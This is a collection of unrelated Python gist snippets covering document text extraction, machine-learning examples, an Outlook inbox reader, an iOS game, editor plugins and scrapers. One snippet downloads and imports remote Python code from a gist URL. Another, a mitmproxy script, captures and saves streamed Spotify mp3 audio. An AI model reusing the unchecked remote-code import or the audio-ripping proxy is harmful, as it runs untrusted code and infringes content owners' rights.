SUPPORT_EXTENTIONS = ['docx', 'doc', 'pdf', 'ppt', 'pptx', 'xls', 'xlsx']
try:
from xml.etree.cElementTree import XML
except ImportError:
from xml.etree.ElementTree import XML
"""
Module that extracts text from an MS XML Word document (.docx).
(Inspired by python-docx <https://github.com/mikemaccana/python-docx>)
"""
WORD_NAMESPACE = '{http://schemas.openxmlformats.org/wordprocessingml/2006/main}'
PARA = WORD_NAMESPACE + 'p'
TEXT = WORD_NAMESPACE + 't'
def get_docx_text(path):
"""
Take the path of a docx file as argument, return the text in unicode.
"""
document = zipfile.ZipFile(path)
xml_content = document.read('word/document.xml')
document.close()
tree = XML(xml_content)
paragraphs = []
for paragraph in tree.getiterator(PARA):
texts = [node.text
for node in paragraph.getiterator(TEXT)
if node.text]
if texts:
paragraphs.append(''.join(texts))
return '\n\n'.join(paragraphs)
def get_pdf_text(path):
pdfFileObj = open(path, 'rb')
pdfReader = PyPDF2.PdfFileReader(pdfFileObj)
res = []
for i in range(pdfReader.numPages):
pageObj = pdfReader.getPage(i)
res.append(pageObj.extractText())
return "\n".join(res)
def get_doc_text(path):
#cmd = ['antiword', '-m', 'utf-8.txt', path]
cmd = ['catdoc', '-d', 'utf-8', path]
try:
p = Popen(cmd, stdout=PIPE)
stdout, stderr = p.communicate()
return stdout.decode('utf-8', 'ignore')
except:
return ''
def get_ppt_text(path):
cmd = ['catppt', '-d', 'utf-8', path]
try:
p = Popen(cmd, stdout=PIPE)
stdout, stderr = p.communicate()
return stdout.decode('utf-8', 'ignore')
except:
return ''
def get_pptx_text(path):
prs = Presentation(path)
text_runs = []
for slide in prs.slides:
for shape in slide.shapes:
if not shape.has_text_frame:
continue
for paragraph in shape.text_frame.paragraphs:
for run in paragraph.runs:
text_runs.append(run.text)
return " ".join(text_runs)
def get_xls_text(path):
workbook = xlrd.open_workbook(path)
sheets_name = workbook.sheet_names()
output = "\n"
for names in sheets_name:
worksheet = workbook.sheet_by_name(names)
num_rows = worksheet.nrows
num_cells = worksheet.ncols
for curr_row in range(num_rows):
#row = worksheet.row(curr_row)
new_output = []
for index_col in xrange(num_cells):
value = worksheet.cell_value(curr_row, index_col)
if value:
if isinstance(value, (int, float)):
value = unicode(value)
new_output.append(value)
if new_output:
output += u' '.join(new_output) + u'\n'
return output
def get_xlsx_text(path):
return get_xls_text(path)
def textract(fname, ftype):
if ftype in SUPPORT_EXTENTIONS:
return getattr(thismodule, 'get_' + str(ftype) + '_text')(fname)
else:
f = open(fname, 'r')
return f.read()
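# --- Hedged usage sketch (added; not part of the original gist) ---
# 'example.docx' is a placeholder path; extensions outside SUPPORT_EXTENTIONS
# fall through to reading the file as plain text.
if __name__ == '__main__':
    extracted_text = textract('example.docx', 'docx')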
```
#### File: hard-gists/3c2e5bf1e77986dfd51f/snippet.py
```python
import keras
from keras.models import Sequential
from keras.layers.core import Dense, Dropout, Activation
from keras.optimizers import SGD
from keras.wrappers.scikit_learn import KerasClassifier
import numpy as np
def target2classes(y):
y_2class = np.zeros((y.shape[0],2))
y_2class[y==0, 0] = 1
y_2class[y==1, 1] = 1
return y_2class
# Data generation
np.random.seed(1337)
X = np.random.rand(88737, 245)
X = (X-X.mean(axis=0))/X.std(axis=0)
y = np.random.binomial(1, 1.0/2500, size=(88737,))
# Model definition
model = Sequential()
model.add(Dense(2000, input_dim=245, init='uniform'))
model.add(Activation('tanh'))
model.add(Dropout(0.2))
model.add(Dense(2000, init='uniform'))
model.add(Activation('tanh'))
model.add(Dropout(0.2))
model.add(Dense(600, init='uniform'))
model.add(Activation('tanh'))
model.add(Dropout(0.2))
model.add(Dense(2, init='uniform'))
model.add(Activation('sigmoid'))
rmsprop = keras.optimizers.RMSprop(lr=0.00001, rho=0.9, epsilon=1e-6)
# Training
y_ohe = target2classes(y)
inverse_frequencies = float(y_ohe.sum())/y_ohe.sum(axis=0)
class_weight = dict((i, inverse_freq) for i, inverse_freq in enumerate(inverse_frequencies))
model.compile(loss='binary_crossentropy',
optimizer=rmsprop)
model.fit(X, y_ohe, batch_size=256,
nb_epoch=1,
class_weight=class_weight,
verbose=1)
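# Added note (rough numbers, not from the original gist): with ~1/2500 positives
# in 88,737 rows, inverse_frequencies comes out near [1.0, ~2500], so class_weight
# is roughly {0: ~1.0, 1: ~2500} -- the rare class is upweighted by its inverse
# frequency during training.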
```
#### File: hard-gists/3d5aa90144a4696be61b3991aa339cc5/snippet.py
```python
import win32com.client
items = []
def encodeit(s):
if isinstance(s, str):
return unicode(s, 'utf-8')
else:
return s
def extract():
outlook = win32com.client.Dispatch("Outlook.Application").GetNamespace("MAPI")
inbox = outlook.GetDefaultFolder(6) # "6" refers to the inbox
messages = inbox.Items
message = messages.GetFirst()
while message:
try:
d = dict()
d['Subject'] = encodeit(getattr(message, 'Subject', '<UNKNOWN>'))
d['SentOn'] = encodeit(getattr(message, 'SentOn', '<UNKNOWN>'))
d['EntryID'] = encodeit(getattr(message, 'EntryID', '<UNKNOWN>'))
d['Sender'] = encodeit(getattr(message, 'Sender', '<UNKNOWN>'))
d['Size'] = encodeit(getattr(message, 'Size', '<UNKNOWN>'))
d['Body'] = encodeit(getattr(message, 'Body', '<UNKNOWN>'))
items.append(d)
except Exception as inst:
print "Error processing mail"
message = messages.GetNext()
def showMessage():
items.sort(key=lambda tup: tup['SentOn'])
for i in items:
print i["SentOn"], i["Subject"]
extract()
showMessage()
```
#### File: hard-gists/3d99498d4236248f9bfbc8ed2fd424fa/snippet.py
```python
import h2o
from h2o.estimators.gbm import H2OGradientBoostingEstimator
from h2o.estimators.deeplearning import H2ODeepLearningEstimator
from h2o.estimators.glm import H2OGeneralizedLinearEstimator
from h2o.estimators.random_forest import H2ORandomForestEstimator
from sklearn import metrics #will be replaced with ensemble_performance later
def source_stack_utils():
'''
Current location of h2o stack python utils
'''
import urllib
url = "https://gist.githubusercontent.com/ledell/8ba8d064ae13169a1821faac70d2211b/raw/7d0fa741df619d1a5340e06258a91831951be8a9/stack.py"
urllib.urlretrieve(url, "stack.py")
def prep_data_example():
# Import a sample binary outcome train/test set into R
train = h2o.import_file("http://www.stat.berkeley.edu/~ledell/data/higgs_10k.csv")
test = h2o.import_file("http://www.stat.berkeley.edu/~ledell/data/higgs_test_5k.csv")
y = "C1"
x = list(train.columns)
x.pop(0)
family = "binomial"
#For binary classification, response should be a factor
train[y] = train[y].asfactor()
test[y] = test[y].asfactor()
return x, y, train, test, family
def cvtrain_base_models(x, y, train, family):
'''
Here we (5-fold) cross-validate a collection of base models
This is an example of an ensemble of nine models:
- 3 GBM
- 3 DL
- 2 RF
- 1 GLM
'''
    # All models must use the exact same CV folds
nfolds = 5
fold_assignment = 'Modulo'
# TO DO: Sync up family and distribution and un-hardcode distribution below
gbm1 = H2OGradientBoostingEstimator(distribution='bernoulli',
ntrees=100,
max_depth=4,
learn_rate=0.1,
nfolds=nfolds,
fold_assignment=fold_assignment,
keep_cross_validation_predictions=True)
gbm2 = H2OGradientBoostingEstimator(distribution='bernoulli',
ntrees=100,
max_depth=4,
learn_rate=0.1,
col_sample_rate=0.7,
nfolds=nfolds,
fold_assignment=fold_assignment,
keep_cross_validation_predictions=True)
gbm3 = H2OGradientBoostingEstimator(distribution='bernoulli',
ntrees=100,
max_depth=2,
learn_rate=0.1,
nfolds=nfolds,
fold_assignment=fold_assignment,
keep_cross_validation_predictions=True)
dl1 = H2ODeepLearningEstimator(distribution='bernoulli',
activation='Rectifier',
hidden=[50,50,50],
l1=1e-5,
epochs=10,
nfolds=nfolds,
fold_assignment=fold_assignment,
keep_cross_validation_predictions=True)
dl2 = H2ODeepLearningEstimator(distribution='bernoulli',
activation='RectifierWithDropout',
hidden=[100,100,100],
input_dropout_ratio=0.2,
l1=1e-5,
epochs=10,
nfolds=nfolds,
fold_assignment=fold_assignment,
keep_cross_validation_predictions=True)
dl3 = H2ODeepLearningEstimator(distribution='bernoulli',
activation='Rectifier',
hidden=[200,200],
l1=1e-6,
epochs=10,
nfolds=nfolds,
fold_assignment=fold_assignment,
keep_cross_validation_predictions=True)
rf1 = H2ORandomForestEstimator(#distribution='bernoulli',
ntrees=300,
nfolds=nfolds,
fold_assignment=fold_assignment,
keep_cross_validation_predictions=True)
rf2 = H2ORandomForestEstimator(#distribution='bernoulli',
ntrees=300,
sample_rate=0.7,
mtries=10,
nfolds=nfolds,
fold_assignment=fold_assignment,
keep_cross_validation_predictions=True)
glm1 = H2OGeneralizedLinearEstimator(family='binomial',
nfolds=nfolds,
fold_assignment=fold_assignment,
keep_cross_validation_predictions=True)
# Edit this list of base models to make different ensembles
models = [gbm1, gbm2, gbm3, dl1, dl2, dl3, rf1, rf2, glm1]
for model in models:
model.train(x=x, y=y, training_frame=train)
return models
def main():
h2o.init()
# Load some example binary response data
x, y, train, test, family = prep_data_example()
# Load stacking utils
source_stack_utils()
from stack import make_Z, get_cvpreds, stack, metapredict
# Cross-validation & training of base models
    # Above we train an arbitrary assortment of base models
models = cvtrain_base_models(x=x, y=y, train=train, family=family)
# Define a NN-GLM metalearner
metalearner = H2OGeneralizedLinearEstimator(family='binomial', non_negative=True)
# Fit the stacked ensemble / Super Learner
metafit = stack(models=models,
metalearner=metalearner,
response_frame=train[y],
seed=1,
keep_levelone_data=True)
# Generate ensemble prediction on the test set
pred, basepred = metapredict(models=models, metafit=metafit, test_data=test)
# TO DO: Add metafit.ensemble_performance()
# Evaluate ensemble test performance
preds = pred[2].as_data_frame(True)
labels = test[y].as_data_frame(True)
fpr, tpr, thresholds = metrics.roc_curve(labels, preds, pos_label=1)
auc = metrics.auc(fpr, tpr)
print str(auc) + " " + "H2O Ensemble"
# Evaluate base learner test set performance (for comparison)
for model in models:
bperf = model.model_performance(test_data=test)
print str(bperf.auc()) + " " + model.model_id
# 0.792100100148 H2O Ensemble
# 0.781849246474 GBM_model_python_1471654758738_1
# 0.782052358716 GBM_model_python_1471654758738_816
# 0.769195957061 GBM_model_python_1471654758738_1837
# 0.729095165124 DeepLearning_model_python_1471654758738_3028
# 0.691393671746 DeepLearning_model_python_1471654758738_3057
# 0.724608757556 DeepLearning_model_python_1471654758738_3086
# 0.78333120166 DRF_model_python_1471654758738_3115
# 0.787051172219 DRF_model_python_1471654758738_3896
# 0.687091955549 GLM_model_python_1471654758738_4639
# In this example, ensemble test AUC was 0.792 and the top base learner was 0.783
```
#### File: hard-gists/4004895/snippet.py
```python
import sys
import numpy as np
import scipy.ndimage as nd
from scipy.cluster.vq import vq
from scipy.misc import imsave
def crayola_9():
"""
Palette of the first 8 crayola colors + white
"""
palette = []
palette.append([0,0,0])
palette.append([31, 117, 254])
palette.append([180, 103, 77])
palette.append([28, 172, 120])
palette.append([255, 117, 56])
palette.append([238, 32 ,77 ])
palette.append([146, 110, 174])
palette.append([252, 232, 131])
palette.append([255, 255, 255])
return np.array(palette)
def quantize(fname, palette):
"""
quantize an image with a given color palette
"""
# read image and resize
img = nd.imread(fname)
# reshape to array of points
pixels = np.reshape(img, (img.shape[0] * img.shape[1], 3))
# quantize
qnt, _ = vq(pixels, palette)
# reshape back to image
centers_idx = np.reshape(qnt, (img.shape[0], img.shape[1]))
clustered = palette[centers_idx]
# return quantized image and histogram
return clustered
if __name__ == '__main__':
# get filename
fname = sys.argv[1]
# quantize single file
result = quantize(fname, crayola_9())
# save resulting image
imsave('output.png', result)
```
#### File: hard-gists/4020619/snippet.py
```python
import Foundation
import objc
import AppKit
import sys
NSUserNotification = objc.lookUpClass('NSUserNotification')
NSUserNotificationCenter = objc.lookUpClass('NSUserNotificationCenter')
def notify(title, subtitle, info_text, delay=0, sound=False, userInfo={}):
notification = NSUserNotification.alloc().init()
notification.setTitle_(title)
notification.setSubtitle_(subtitle)
notification.setInformativeText_(info_text)
notification.setUserInfo_(userInfo)
if sound:
notification.setSoundName_("NSUserNotificationDefaultSoundName")
notification.setDeliveryDate_(Foundation.NSDate.dateWithTimeInterval_sinceDate_(delay, Foundation.NSDate.date()))
NSUserNotificationCenter.defaultUserNotificationCenter().scheduleNotification_(notification)
notify("Test message", "Subtitle", "This message should appear instantly, with a sound", sound=True)
sys.stdout.write("Notification sent...\n")
```
#### File: hard-gists/4034426/snippet.py
```python
import Image
import ImageDraw
import ImageFont
import clipboard
def draw_caption(img, text, top=False):
draw = ImageDraw.Draw(img)
#Find a suitable font size to fill the entire width:
w = img.size[0]
s = 100
while w >= (img.size[0] - 20):
font = ImageFont.truetype('HelveticaNeue-CondensedBlack', s)
w, h = draw.textsize(text, font=font)
s -= 1
if s <= 12: break
#Draw the text multiple times in black to get the outline:
for x in xrange(-3, 4):
for y in xrange(-3, 4):
draw_y = y if top else img.size[1] - h + y
draw.text((10 + x, draw_y), text, font=font, fill='black')
#Draw the text once more in white:
draw_y = 0 if top else img.size[1] - h
draw.text((10, draw_y), text, font=font, fill='white')
def main():
print 'Loading image from clipboard...'
img = clipboard.get_image()
if img is None:
print 'No image in clipboard, using default image instead...'
img = Image.open('Test_Mandrill')
img.show()
print 'Enter the top caption (press return for none):'
caption_top = unicode(raw_input(), 'utf-8')
caption_top = caption_top.upper()
if caption_top != '':
draw_caption(img, caption_top, top=True)
print 'Enter the bottom caption (press return for none):'
caption_btm = unicode(raw_input(), 'utf-8')
caption_btm = caption_btm.upper()
if caption_btm != '':
draw_caption(img, caption_btm, top=False)
img.show()
# If you want to copy the result to the clipboard automatically,
# uncomment the following line:
#clipboard.set_image(img.convert('RGBA'))
# You can also copy an image from the console output or save it
# to your camera roll by touching and holding it.
if __name__ == '__main__':
main()
```
#### File: hard-gists/4050951/snippet.py
```python
from scene import *
from random import randint, random, choice
from sound import play_effect
from colorsys import hsv_to_rgb
from math import sin
from functools import partial
from copy import copy
class Star (object):
def __init__(self):
self.x = randint(0, 768)
self.y = randint(0, 1024)
self.v = random() * 5 + 1
def update(self):
self.y -= self.v
class StarField (object):
def __init__(self, scene, count):
self.scene = scene
self.stars = []
for i in xrange(count):
self.stars.append(Star())
def update(self):
removed_stars = set()
for star in self.stars:
star.update()
if star.y < 0:
removed_stars.add(star)
for removed_star in removed_stars:
self.stars.remove(removed_star)
new_star = Star()
new_star.y = self.scene.size.h
self.stars.append(new_star)
def draw(self):
background(0, 0.02, 0.1)
for star in self.stars:
a = (star.v / 5) * 0.7
fill(a, a, a)
rect(star.x, star.y, 3, 3)
class Player (object):
def __init__(self, scene):
self.scene = scene
self.x = scene.size.w / 2
self.dead = False
def update(self):
gx = gravity().x * 50
self.x = min(max(self.x + gx, 20), self.scene.size.w - 20)
def draw(self):
push_matrix()
translate(self.x, 20)
rotate(45)
image('Rocket', 0, 0, 64, 64)
pop_matrix()
def bbox(self):
return Rect(self.x - 20, 20, 40, 85)
class Enemy (object):
def __init__(self, scene):
self.scene = scene
self.hit = False
self.x = randint(20, 768-20)
self.initial_x = self.x
self.y = 1024
self.a = 1.0
self.removed = False
self.dead = False
r = random()
if r < 0.1:
self.size = 128
self.color = Color(0, 1, 1)
self.points = 500
self.energy = 3
self.bullet_type = 3
elif r < 0.5:
self.size = 96
self.color = Color(0, 1, 0)
self.points = 250
self.energy = 2
self.bullet_type = 2
else:
self.size = 64
self.color = Color(1, 0, 1)
self.points = 100
self.energy = 1
self.bullet_type = 1
self.fire_freq = randint(20, 200)
self.fire = False
self.t = randint(0, self.fire_freq)
self.speed = 1.0 / self.size * 500
self.amp = random() * 300
def update(self, dt):
self.y -= self.speed
self.x = self.initial_x + sin(self.y / 100) * self.amp
self.amp = max(self.amp * 0.99, 0)
if self.y < -64:
self.removed = True
if self.dead:
self.a -= 0.1
if self.a <= 0:
self.removed = True
else:
self.t += 1
if not self.dead and self.t % self.fire_freq == 0:
play_effect('Laser_5')
if self.bullet_type == 1:
bullet = Bullet(self.x, self.y)
bullet.vy = -10
bullet.bullet_type = 1
self.scene.enemy_bullets.append(bullet)
elif self.bullet_type == 2:
for vx in [-3, 3]:
bullet = Bullet(self.x, self.y)
bullet.vy = -10
bullet.vx = vx
bullet.bullet_type = 2
self.scene.enemy_bullets.append(bullet)
else:
for vx in [-3, 0, 3]:
bullet = Bullet(self.x, self.y)
bullet.vy = -10
bullet.vx = vx
bullet.bullet_type = 3
self.scene.enemy_bullets.append(bullet)
def draw(self):
if self.hit:
tint(1, 0, 0, self.a)
else:
tint(self.color.r, self.color.g, self.color.b, self.a)
image('Alien_Monster', self.x - self.size/2,
self.y - self.size/2, self.size, self.size)
tint(1, 1, 1)
def bbox(self):
s = self.size
return Rect(self.x - s/2 * 0.9, self.y - s/2 * 0.8, s * 0.9, s * 0.8)
class Powerup (object):
def __init__(self, scene, powerup_type):
self.x = randint(20, 768-20)
self.y = scene.size.h + 20
self.hue = 0.0
self.rot = 0.0
self.t = 0.0
self.powerup_type = powerup_type
def update(self):
self.hue += 0.02
self.y -= 10
self.rot -= 3.0
self.t += 0.1
def draw(self):
if self.powerup_type == 0:
s = 50 + sin(self.t) * 10
image('Heart', self.x - s/2, self.y - s/2, s, s)
else:
push_matrix()
tint(*hsv_to_rgb(self.hue, 1, 1))
translate(self.x, self.y)
rotate(self.rot)
image('Star_1', -32, -32, 64, 64)
tint(1, 1, 1)
pop_matrix()
def bbox(self):
return Rect(self.x - 32, self.y - 32, 64, 64)
class Bullet (object):
def __init__(self, x, y):
self.x = x
self.y = y
self.vx = 0
self.vy = 0
self.bullet_type = 0
self.pass_through = False
self.hue = 0.0
def update(self):
self.x += self.vx
self.y += self.vy
if self.pass_through:
self.hue += 0.02
def draw(self):
if self.pass_through:
fill(*hsv_to_rgb(self.hue, 1, 1))
ellipse(self.x - 4, self.y - 4, 8, 8)
elif self.bullet_type == 0:
fill(1, 1, 0)
ellipse(self.x - 4, self.y - 4, 8, 8)
elif self.bullet_type == 1:
fill(1, 0, 1)
rect(self.x - 2, self.y - 8, 4, 16)
elif self.bullet_type == 2:
fill(0, 1, 0)
ellipse(self.x - 4, self.y - 4, 8, 8)
elif self.bullet_type == 3:
fill(0, 1, 1)
ellipse(self.x - 4, self.y - 4, 8, 8)
def hit_test(self, rect):
return Point(self.x, self.y) in rect
class Game (Scene):
def setup(self):
self.frame_count = 0
self.delayed_invocations = []
self.frenzy = False
self.touch_disabled = False
self.star_field = StarField(self, 30)
self.player = Player(self)
self.energy = 100
self.score = 0
self.player.dead = False
self.stars = []
self.bullets = []
self.enemies = []
self.powerups = []
self.enemy_bullets = []
self.shot_fired = False
self.effects_layer = Layer(Rect(0, 0, self.size.w, self.size.h))
self.spawn()
def spawn(self):
self.enemies.append(Enemy(self))
self.delay(random() + 0.5, self.spawn)
if random() < 0.05:
powerup = Powerup(self, choice([0, 1]))
self.powerups.append(powerup)
def draw(self):
self.shot_fired = False
self.star_field.update()
self.star_field.draw()
removed_bullets = set()
removed_enemy_bullets = set()
removed_enemies = set()
fill(1, 1, 0)
for bullet in self.bullets:
bullet.update()
bullet.draw()
if bullet.y > 1024:
removed_bullets.add(bullet)
player_rect = self.player.bbox()
fill(1, 0, 1)
for bullet in self.enemy_bullets:
bullet.update()
bullet.draw()
if bullet.y < -4:
removed_enemy_bullets.add(bullet)
elif not self.player.dead and bullet.hit_test(player_rect):
removed_enemy_bullets.add(bullet)
self.energy -= 10
play_effect('Explosion_6')
for enemy in self.enemies:
enemy.update(self.dt)
enemy.draw()
enemy_rect = enemy.bbox()
if not enemy.dead:
for bullet in self.bullets:
if bullet.hit_test(enemy_rect):
removed_bullets.add(bullet)
enemy.energy -= 1
enemy.hit = True
self.delay(0.1, partial(enemy.__setattr__, 'hit', False))
if enemy.energy <= 0:
enemy.dead = True
self.explosion(enemy)
self.score += enemy.points
play_effect('Explosion_4')
else:
play_effect('Explosion_5')
if not self.player.dead and player_rect.intersects(enemy_rect):
play_effect('Explosion_6')
enemy.dead = True
self.explosion(enemy)
self.energy -= 10
if enemy.removed:
removed_enemies.add(enemy)
removed_powerups = set()
for powerup in self.powerups:
powerup.update()
powerup.draw()
if player_rect.intersects(powerup.bbox()):
if powerup.powerup_type == 0:
play_effect('Coin_2')
self.energy = min(100, self.energy + 20)
else:
play_effect('Powerup_3')
self.frenzy = True
self.delay(5.0, partial(self.__setattr__, 'frenzy', False))
removed_powerups.add(powerup)
elif powerup.y < -32:
removed_powerups.add(powerup)
map(self.powerups.remove, removed_powerups)
map(self.enemies.remove, removed_enemies)
map(self.bullets.remove, removed_bullets)
map(self.enemy_bullets.remove, removed_enemy_bullets)
if not self.player.dead and self.energy <= 0:
self.game_over()
if not self.player.dead:
self.player.update()
self.player.draw()
self.draw_status_bar()
self.effects_layer.update(self.dt)
self.effects_layer.draw()
tint(1, 1, 1)
self.frame_count += 1
if not self.player.dead and len(self.touches) > 0:
if self.frame_count % 12 == 0:
self.fire()
def game_over(self):
self.player.dead = True
self.touch_disabled = True
play_effect('Laser_4')
t = TextLayer('Game Over', 'Futura', 100)
t.frame.center(self.bounds.center())
self.delay(2.0, partial(self.__setattr__, 'touch_disabled', False))
t.scale_x, t.scale_y = 0.0, 0.0
t.animate('scale_x', 1.0, 1.0, curve=curve_bounce_out)
t.animate('scale_y', 1.0, 1.0, curve=curve_bounce_out)
self.effects_layer.add_layer(t)
def touch_began(self, touch):
if self.player.dead and not self.touch_disabled:
play_effect('Powerup_1')
self.setup()
return
elif not self.player.dead:
self.frame_count = 0
self.fire()
def fire(self):
if self.shot_fired: return
if self.frenzy:
for vx in [-3, 0, 3]:
bullet = Bullet(self.player.x, 110)
bullet.vy = 15
bullet.vx = vx
bullet.pass_through = True
self.bullets.append(bullet)
else:
bullet = Bullet(self.player.x, 110)
bullet.vy = 15
self.bullets.append(bullet)
play_effect('Laser_6')
self.shot_fired = True
def draw_status_bar(self):
hue = (self.energy / 100.0) * 0.35 + 1.0
r, g, b = hsv_to_rgb(hue, 1, 1)
fill(r, g, b)
rect(0, self.size.h - 5, self.energy / 100.0 * self.size.w, 5)
text(str(self.score), 'Futura', 40,
self.size.w / 2, self.size.h - 60)
def explosion(self, enemy):
for i in xrange(int(enemy.size / 6)):
s = enemy.size / 5
l = Layer(Rect(enemy.x - s/2, enemy.y - s/2, s, s))
l.background = enemy.color
l.animate('frame', Rect(enemy.x + randint(-100, 100),
enemy.y + randint(-100, 100),
s/3, s/3), curve=curve_ease_out)
l.animate('alpha', 0.0, 0.5, completion=l.remove_layer)
self.effects_layer.add_layer(l)
run(Game(), PORTRAIT)
```
#### File: hard-gists/4070026/snippet.py
```python
import subprocess
import sublime, sublime_plugin
import re
# RailsCopyMigrationVersion
# ========
#
# A Sublime Text 2 plugin that provides a `copy_migration_version` command to copy the migration version of the current migration file.
#
class CopyMigrationVersionCommand(sublime_plugin.TextCommand):
def run(self, edit):
match = re.search('\d{14}', self.view.file_name())
if match:
version = match.group()
sublime.set_clipboard(version)
sublime.status_message("copied: %s" % version)
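# Added note (illustrative, not part of the original plugin): to trigger the
# command from the keyboard, a user key binding like the following could be
# added (the key combination is an example only):
#   { "keys": ["ctrl+shift+m"], "command": "copy_migration_version" }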
```
#### File: hard-gists/4089133/snippet.py
```python
import random
import hashlib
from libmproxy import proxy, flow
class SpotifyProxy(flow.FlowMaster):
def run(self):
try:
flow.FlowMaster.run(self)
except KeyboardInterrupt:
self.shutdown()
def handle_request(self, r):
f = flow.FlowMaster.handle_request(self, r)
if f:
r._ack()
return f
def handle_response(self, r):
f = flow.FlowMaster.handle_response(self, r)
if f:
r._ack()
if 'cloudfront.net' in f.request.host and 'mp3' in f.request.path:
filename = '%s.mp3' % hashlib.sha1(str(random.random())).hexdigest()
mp3 = open(filename, 'w')
mp3.write(f.response.content)
mp3.close()
print "Saved to %s" % filename
return f
config = proxy.ProxyConfig()
state = flow.State()
server = proxy.ProxyServer(config, 9000)
m = SpotifyProxy(server, state)
m.run()
```
#### File: hard-gists/4104455/snippet.py
```python
import re, ez_epub, urllib2, genshi
from BeautifulSoup import BeautifulSoup
def addSection(link, title):
if not 'http' in link:
page = urllib2.urlopen('http://www.paulgraham.com/'+link).read()
soup = BeautifulSoup(page)
soup.prettify()
else:
page = urllib2.urlopen(link).read()
section = ez_epub.Section()
try:
section.title = title
print section.title
if not 'http' in link:
font = str(soup.findAll('table', {'width':'455'})[0].findAll('font')[0])
if not 'Get funded by' in font and not 'Watch how this essay was' in font and not 'Like to build things?' in font and not len(font)<100:
content = font
else:
content = ''
for par in soup.findAll('table', {'width':'455'})[0].findAll('p'):
content += str(par)
for p in content.split("<br /><br />"):
section.text.append(genshi.core.Markup(p))
#exception for Subject: Airbnb
for pre in soup.findAll('pre'):
section.text.append(genshi.core.Markup(pre))
else:
for p in str(page).replace("\n","<br />").split("<br /><br />"):
section.text.append(genshi.core.Markup(p))
except:
pass
return section
book = ez_epub.Book()
book.title = "Paul Graham's Essays"
book.authors = ['Paul Graham']
page = urllib2.urlopen('http://www.paulgraham.com/articles.html').read()
soup = BeautifulSoup(page)
soup.prettify()
links = soup.findAll('table', {'width': '455'})[1].findAll('a')
sections = []
for link in links:
sections.append(addSection(link['href'], link.text))
book.sections = sections
book.make(book.title)
```
#### File: hard-gists/4130c73434db79119f27/snippet.py
```python
import logging
from googleapiclient.discovery import build
from oauth2client.client import GoogleCredentials
class CloudLoggingHandler(logging.Handler):
def __init__(self, project_id):
logging.Handler.__init__(self)
self.project_id = project_id
credentials = GoogleCredentials.get_application_default()
self.logging_api = build('logging', 'v2beta1', credentials=credentials)
def emit(self, record):
print(str(record))
self.logging_api.entries().write(
body={
"entries": [
{
"severity": record.levelname,
"jsonPayload": {
"module": record.module,
"message": record.getMessage()
},
"logName": "projects/" + self.project_id + "/logs/" + record.name,
"resource": {
"type": "global",
}
}
]
}
).execute()
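# --- Hedged usage sketch (added; not part of the original gist) ---
# 'my-project' is a placeholder project id; any stdlib logger can forward its
# records to Cloud Logging once the handler is attached.
if __name__ == '__main__':
    log = logging.getLogger('example')
    log.setLevel(logging.INFO)
    log.addHandler(CloudLoggingHandler('my-project'))
    log.info('hello from CloudLoggingHandler')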
```
#### File: hard-gists/4131398/snippet.py
```python
from IPython.core.display import Image as image
from PIL import Image
def save_and_display(arr, fname):
pilimg = Image.fromarray(arr)
pilimg.save(fname)
return image(filename=fname, width=600)
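# Hedged usage sketch (added): 'arr' is assumed to be a uint8 HxWx3 numpy array, e.g.
#   save_and_display((255 * numpy.random.rand(64, 64, 3)).astype('uint8'), 'demo.png')
# would write demo.png and return an inline IPython Image 600px wide.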
```
#### File: hard-gists/4180945/snippet.py
```python
from scene import *
from PIL import Image
import urllib, os
start = Point(3, 1) #the sheet has 8 sets of characters in a 4x2 grid.
ssize = Size(96, 128)
speed = 0.15
frames = [0, 1, 2, 1] #4 frames per walk cycle
dirs = [0, 3, 9, 6] #start frame for direction
moveamt = 32
mov = [(0, -moveamt), (-moveamt, 0), (0, moveamt), (moveamt, 0)]
keycolor = (0, 255, 0, 255)
gravsense = 0.06
north = 0
south = 2
east = 1
west = 3
def wrap(v, ext):
if v < 0:
return ext + v
elif v >= ext:
return v - ext
return v
def gravitydirections(dir):
ax = abs(dir.x)
ay = abs(dir.y)
dx = 0
dy = 0
#If x is larger than the sensitivity then set east or west.
if ax > gravsense:
dx = west if dir.x > 0 else east
#If y is larger than the sensitivity then set north or south.
if ay > gravsense:
dy = south if dir.y > 0 else north
#return direction tuple in order of largest gravity direction.
return dy if ay > ax else dx
class MyScene (Scene):
def setup(self):
# This will be called before the first frame is drawn.
if not os.path.exists('Images'):
os.mkdir('Images')
if not os.path.exists("Images/soldier2.png"):
url = urllib.urlopen('http://img63.imageshack.us/img63/4348/americanset.png')
with open("Images/soldier2.png", "wb") as output:
output.write(url.read())
img = Image.open("Images/soldier2.png").convert('RGBA')
img.show()
strt = Point(start.x * ssize.w, start.y * ssize.h)
img = img.crop((strt.x, strt.y,strt.x + ssize.w - 1, strt.y + ssize.h - 1))
d = img.load()
keycolor = d[0,0] #1st pixel is used as keycolor.
for x in range(img.size[0]):
for y in range(img.size[1]):
p = d[x, y]
if p == keycolor: #if keycolor set alpha to 0.
d[x, y] = (p[0], p[1], p[2], 0)
img.show()
def getframe(x, y):
nim = img.crop((x * 32, y * 32, (x+1) * 32, (y+1) * 32))
# nim = nim.resize((16,16), Image.ANTIALIAS)
return load_pil_image(nim)
self.images = [ getframe(x,y) for y in xrange(4) for x in xrange(3) ]
self.start = 0
self.base = 0
self.dir = 0
self.delay = speed
self.x = 400
self.y = 400
def draw(self):
# This will be called for every frame (typically 60 times per second).
self.dir = gravitydirections(gravity())
background(0, 0, 1)
d = self.dir
mv = mov[d]
self.x += mv[0] * self.dt
self.y += mv[1] * self.dt
self.x = wrap(self.x, self.size.w)
self.y = wrap(self.y, self.size.h)
image(self.images[dirs[d] + frames[self.start]], self.x, self.y, 32, 32)
self.delay -= self.dt
if self.delay <= 0:
self.delay += speed
self.start += 1
if self.start >= len(frames):
self.start = 0
run(MyScene(), PORTRAIT)
```
#### File: hard-gists/4217925/snippet.py
```python
from ghost import Ghost
from PySide.QtGui import QApplication, QImage, QPainter, QPrinter
class MyGhost(Ghost):
def capture_pdf(self):
printer = QPrinter(QPrinter.HighResolution)
printer.setResolution(300)
printer.setOutputFileName("QtPrinter.pdf")
printer.setPaperSize(QPrinter.A4)
printer.setOrientation(QPrinter.Landscape)
printer.setOutputFormat(QPrinter.PdfFormat)
painter = QPainter(printer)
self.main_frame.render(painter)
painter.end()
ghost = MyGhost(viewport_size=(1280,960))
page, resources = ghost.open('http://127.0.0.1:8000/path/to/page/to/capture/')
ghost.capture_pdf()
```
#### File: hard-gists/4243633/snippet.py
```python
import struct
from Crypto.Cipher import AES
QUAD = struct.Struct('>Q')
def aes_unwrap_key_and_iv(kek, wrapped):
n = len(wrapped)/8 - 1
#NOTE: R[0] is never accessed, left in for consistency with RFC indices
